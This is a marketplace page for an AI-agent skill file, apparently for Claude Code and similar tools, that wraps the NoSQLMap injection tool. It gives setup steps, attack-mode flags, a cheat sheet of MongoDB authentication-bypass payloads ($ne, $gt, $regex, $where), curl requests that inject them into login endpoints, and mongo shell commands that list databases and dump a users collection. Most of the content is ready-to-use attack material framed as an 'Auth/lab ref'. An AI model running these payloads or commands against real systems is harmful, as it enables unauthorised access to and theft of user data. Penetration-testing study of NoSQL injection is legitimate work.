aeondave/nosqlmap
offensive-tools/vuln-scanners/nosqlmap/SKILL.md
Auth/lab ref: automated NoSQL injection detection and exploitation tool targeting MongoDB, CouchDB, and other NoSQL databases.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill nosqlmapInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Jun 8, 2026, 4:06 AM159.9s2 files scanned
SKILL.md
- name:
- nosqlmap
- description:
- Auth/lab ref: automated NoSQL injection detection and exploitation tool targeting MongoDB, CouchDB, and other NoSQL databases.
- license:
- GPL-2.0
- compatibility:
- Linux / macOS / Windows; Python 3.
- author:
- AeonDave
- version:
- 1.0
NoSQLMap
Automated NoSQL injection and exploitation — MongoDB, CouchDB, server-side JS injection.
Quick Start
git clone https://github.com/codingo/NoSQLMap
cd NoSQLMap && python3 setup.py install
# Launch interactive menu
python3 nosqlmap.py
# Or direct web app attack
python3 nosqlmap.py --attack 3
Interactive Menu
Main Menu:
1 - Set options (target, port, URI)
2 - NoSQL DB Access Attacks # Direct DB connection exploits
3 - NoSQL Web App Attacks # HTTP injection via web app
4 - Scan for Anonymous MongoDB Access
x - Exit
Web App Attack Setup (Option 3)
Set options first:
1 - Set target host: target.com
2 - Set web app port: 443
3 - Set URI: /api/login
4 - Set HTTP method: POST
5 - Set POST data: {"username":"admin","password":"test"}
6 - Set parameter to attack: password
Then run:
3 - Assess NoSQL injections # Test all injection types
4 - MongoDB injection # Focused MongoDB test
Injection Techniques
| Technique | Payload | Effect |
|-----------|---------|--------|
| Auth Bypass | {"$ne": "invalid"} | Matches anything != value |
| Auth Bypass | {"$gt": ""} | Matches anything > empty |
| Regex | {"$regex": ".*"} | Matches all via regex |
| Where | {"$where": "1==1"} | Server-side JS eval |
| Array | ["admin", "user"] | Array injection |
Raw Manual Payloads
# JSON body — auth bypass
curl -s -X POST https://target.com/login \
-H "Content-Type: application/json" \
-d '{"username": "admin", "password": {"$ne": "wrongpass"}}'
# URL parameter — array injection
curl "https://target.com/api?user[$ne]=invalid"
# PHP-style param array
curl "https://target.com/api?user[$regex]=.*&password[$ne]=invalid"
Direct MongoDB Access Attacks (Option 2)
Requires network access to MongoDB port (27017):
# Anonymous access scan (no creds required)
python3 nosqlmap.py --attack 4 --rhost 10.0.0.1
# Enumerate databases on open MongoDB
mongo --host target.com --port 27017
> show dbs
> use admin
> show collections
> db.users.find()
NoSQLMap Flags (Direct Mode)
| Flag | Purpose |
|------|---------|
| --attack <n> | Attack mode: 2=DB access, 3=web app, 4=anon scan |
| --rhost <host> | Target host |
| --rport <port> | Target port (default: 27017 for MongoDB) |
| --webPort <port> | Web app port (default: 80) |
| --uri <path> | Web URI path |
| --httpMethod <m> | GET or POST |
| --postData <data> | POST body |
| --injectedParam <p> | Parameter to inject |
| --verbose | Verbose output |
MongoDB Auth Bypass Cheat Sheet
// Login forms — try these as password values:
{"$ne": null}
{"$ne": "x"}
{"$gt": ""}
{"$gte": ""}
{"$regex": ".*"}
{"$where": "1==1"}
// Username + password bypass combo:
// username: admin, password: {"$ne": "x"}
// username: {"$regex": "admin.*"}, password: {"$ne": "x"}
References
- NoSQLMap GitHub
- NoSQL injection payloads:
references/nosql-payloads.md - HackTricks NoSQL Injection
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026